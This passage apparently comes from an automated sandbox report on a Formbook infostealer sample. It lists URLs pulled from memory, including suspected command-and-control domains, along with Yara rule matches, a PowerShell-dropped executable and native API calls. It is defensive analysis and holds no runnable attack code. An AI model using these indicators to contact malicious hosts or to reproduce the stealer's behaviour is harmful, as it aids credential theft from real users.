Source: compact.exe, 0000001A.00000002.3721935627.0000000005134000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003D74000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: P1 HWT623ATG.bat.exe, 00000001.00000002.1286350023.00000000030F7000.00000004.00000800.00020000.00000000.sdmp, GnVIdcfKFYG.exe, 0000000A.00000002.1498915015.0000000002553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css
Source: compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2
Source: compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: Smilet.exe, 00000028.00000001.3704245850.0000000000649000.00000020.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3723441735.000000000519A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.leadchanges.info
Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3723441735.000000000519A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.leadchanges.info/mjuo/
Source: compact.exe, 0000001A.00000002.3721935627.00000000052C6000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: Smilet.exe, 00000028.00000001.3704245850.00000000005F2000.00000020.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Smilet.exe, 00000028.00000001.3704245850.00000000005F2000.00000020.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css
Source: compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fburl.com
Source: compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Abel:400%7CMaven
Source: compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3721935627.000000000577C000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000043BC000.00000004.00000001.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: Smilet.exe, 00000028.00000001.3704245850.0000000000649000.00000020.00000001.01000000.00000014.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: compact.exe, 0000001A.00000002.3711399927.00000000034FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: compact.exe, 0000001A.00000002.3711399927.00000000034FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033GW
Source: compact.exe, 0000001A.00000002.3711399927.00000000034FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: compact.exe, 0000001A.00000003.1813904196.0000000008250000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://niteothemes.com
Source: compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://optimize.google.com
Source: P1 HWT623ATG.bat.exe, GnVIdcfKFYG.exe.1.dr	String found in binary or memory: https://raw.github.com/natrim/Sign-Control/master/release.txt
Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://shahaf3d.com
Source: compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://shahaf3d.com/wp-admin/admin-ajax.php
Source: hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://td.doubleclick.net
Source: compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
Source: compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
Source: compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wordpress.org/plugins/cmp-coming-soon-maintenance/
Source: compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: compact.exe, 0000001A.00000002.3721935627.0000000004636000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003276000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.1921583639.000000000E196000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.futuregainers.net/l4k7/?9d=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqM
Source: compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googleanalytics.com
Source: compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googleoptimize.com
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: compact.exe, 0000001A.00000002.3721935627.00000000047C8000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003408000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hostgator.com.br
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
Source: compact.exe, 0000001A.00000002.3721935627.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://youtu.be/uO1hXLmT2j4
Source: compact.exe, 0000001A.00000002.3721935627.0000000005134000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003D74000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 9.2.P1 HWT623ATG.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.P1 HWT623ATG.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.3719971214.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3723441735.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3709324958.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3719882402.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1575209433.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1575852421.0000000000BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1578650551.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3719927203.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 9.2.P1 HWT623ATG.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.P1 HWT623ATG.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.3719971214.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.3723441735.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.3709324958.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.3719882402.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1575209433.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1575852421.0000000000BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1578650551.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.3719927203.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 1.2.P1 HWT623ATG.bat.exe.64c0000.9.raw.unpack, .cs	Large array initialization: : array initializer size 28702
Source: 1.2.P1 HWT623ATG.bat.exe.311b5f8.1.raw.unpack, .cs	Large array initialization: : array initializer size 28702
Source: 10.2.GnVIdcfKFYG.exe.252b60c.7.raw.unpack, .cs	Large array initialization: : array initializer size 28702

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Smilet.exe

Jump to dropped file

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_0042B543 NtClose,	9_2_0042B543
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272B60 NtClose,LdrInitializeThunk,	9_2_01272B60
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01272DF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_01272C70
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_012735C0 NtCreateMutant,LdrInitializeThunk,	9_2_012735C0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01274340 NtSetContextThread,	9_2_01274340
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01274650 NtSuspendThread,	9_2_01274650
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272BA0 NtEnumerateValueKey,	9_2_01272BA0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272B80 NtQueryInformationFile,	9_2_01272B80
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272BE0 NtQueryValueKey,	9_2_01272BE0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272BF0 NtAllocateVirtualMemory,	9_2_01272BF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272AB0 NtWaitForSingleObject,	9_2_01272AB0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272AF0 NtWriteFile,	9_2_01272AF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272AD0 NtReadFile,	9_2_01272AD0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272D30 NtUnmapViewOfSection,	9_2_01272D30
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272D00 NtSetInformationFile,	9_2_01272D00
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272D10 NtMapViewOfSection,	9_2_01272D10
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272DB0 NtEnumerateKey,	9_2_01272DB0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272DD0 NtDelayExecution,	9_2_01272DD0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272C00 NtQueryInformationProcess,	9_2_01272C00
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272C60 NtCreateKey,	9_2_01272C60
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272CA0 NtQueryInformationToken,	9_2_01272CA0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272CF0 NtOpenProcess,	9_2_01272CF0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272CC0 NtQueryVirtualMemory,	9_2_01272CC0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272F30 NtCreateSection,	9_2_01272F30
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272F60 NtCreateProcessEx,	9_2_01272F60
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272FA0 NtQuerySection,	9_2_01272FA0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272FB0 NtResumeThread,	9_2_01272FB0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272F90 NtProtectVirtualMemory,	9_2_01272F90
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272FE0 NtCreateFile,	9_2_01272FE0
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272E30 NtWriteVirtualMemory,	9_2_01272E30
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Code function: 9_2_01272EA0 NtAdjustPrivilegesToken,	9_2_01272EA0
